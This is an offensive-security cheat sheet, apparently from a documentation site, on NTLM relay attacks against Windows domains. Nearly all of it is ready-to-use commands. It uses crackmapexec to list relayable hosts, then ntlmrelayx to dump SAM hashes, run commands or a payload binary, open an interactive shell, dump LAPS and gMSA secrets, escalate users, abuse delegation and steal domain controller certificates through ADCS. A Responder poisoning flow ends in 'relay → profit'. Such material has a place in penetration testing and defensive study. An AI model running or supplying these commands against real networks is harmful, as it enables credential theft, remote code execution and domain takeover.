> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# NTLM Relay

> NTLM relay attacks: ntlmrelayx, relay to SMB/LDAP/MSSQL, and delegation abuse.

## Overview

Capture NTLM authentication and relay to another service. Attacker acts as MITM — victim authenticates to attacker, attacker forwards to target.

***

## Check SMB Signing

```bash theme={"dark"}
crackmapexec smb 10.10.10.0/24 --gen-relay-list relay_targets.txt
```

Targets with SMB signing **disabled** or **not required** are relayable.

***

## ntlmrelayx — SMB Relay

### Basic (SAM Dump)

```bash theme={"dark"}
impacket-ntlmrelayx -tf targets.txt -smb2support
```

### Execute Command

```bash theme={"dark"}
impacket-ntlmrelayx -tf targets.txt -smb2support -c "whoami"
```

### Interactive Shell

```bash theme={"dark"}
impacket-ntlmrelayx -tf targets.txt -smb2support -i
# Connect: nc 127.0.0.1 11000
```

### Execute Binary

```bash theme={"dark"}
impacket-ntlmrelayx -tf targets.txt -smb2support -e payload.exe
```

***

## ntlmrelayx — LDAP Relay

### Create Machine Account (RBCD)

```bash theme={"dark"}
impacket-ntlmrelayx -t ldap://DC_IP --delegate-access
```

### Dump LDAP

```bash theme={"dark"}
impacket-ntlmrelayx -t ldap://DC_IP --dump-laps
impacket-ntlmrelayx -t ldap://DC_IP --dump-gmsa
```

### Add User to Group

```bash theme={"dark"}
impacket-ntlmrelayx -t ldap://DC_IP --escalate-user targetuser
```

***

## ntlmrelayx — MSSQL

```bash theme={"dark"}
impacket-ntlmrelayx -t mssql://SQL_IP -smb2support -q "SELECT system_user"
```

***

## ntlmrelayx — ADCS (ESC8)

```bash theme={"dark"}
impacket-ntlmrelayx -t http://CA_IP/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
```

***

## Coerce Authentication

Trigger victim to authenticate to attacker:

| Method       | Tool                   |
| ------------ | ---------------------- |
| Responder    | LLMNR/NBT-NS poisoning |
| PetitPotam   | MS-EFSRPC              |
| PrinterBug   | MS-RPRN (SpoolService) |
| DFSCoerce    | MS-DFSNM               |
| ShadowCoerce | MS-FSRVP               |

***

## Typical Attack Flow

```
1. Disable SMB/HTTP in Responder (Responder handles poisoning only)
2. Start ntlmrelayx with targets
3. Start Responder
4. Wait for auth → relay → profit
```

### Responder Config

```bash theme={"dark"}
# /etc/responder/Responder.conf
SMB = Off
HTTP = Off
```

```bash theme={"dark"}
responder -I eth0
```

***

## Quick Reference

| Task         | Command                                                |
| ------------ | ------------------------------------------------------ |
| Find targets | `crackmapexec smb SUBNET --gen-relay-list targets.txt` |
| Relay SMB    | `ntlmrelayx -tf targets.txt -smb2support`              |
| Relay LDAP   | `ntlmrelayx -t ldap://DC --delegate-access`            |
| Relay ADCS   | `ntlmrelayx -t http://CA/certsrv/... --adcs`           |
| Exec cmd     | `ntlmrelayx -tf targets.txt -c "whoami"`               |
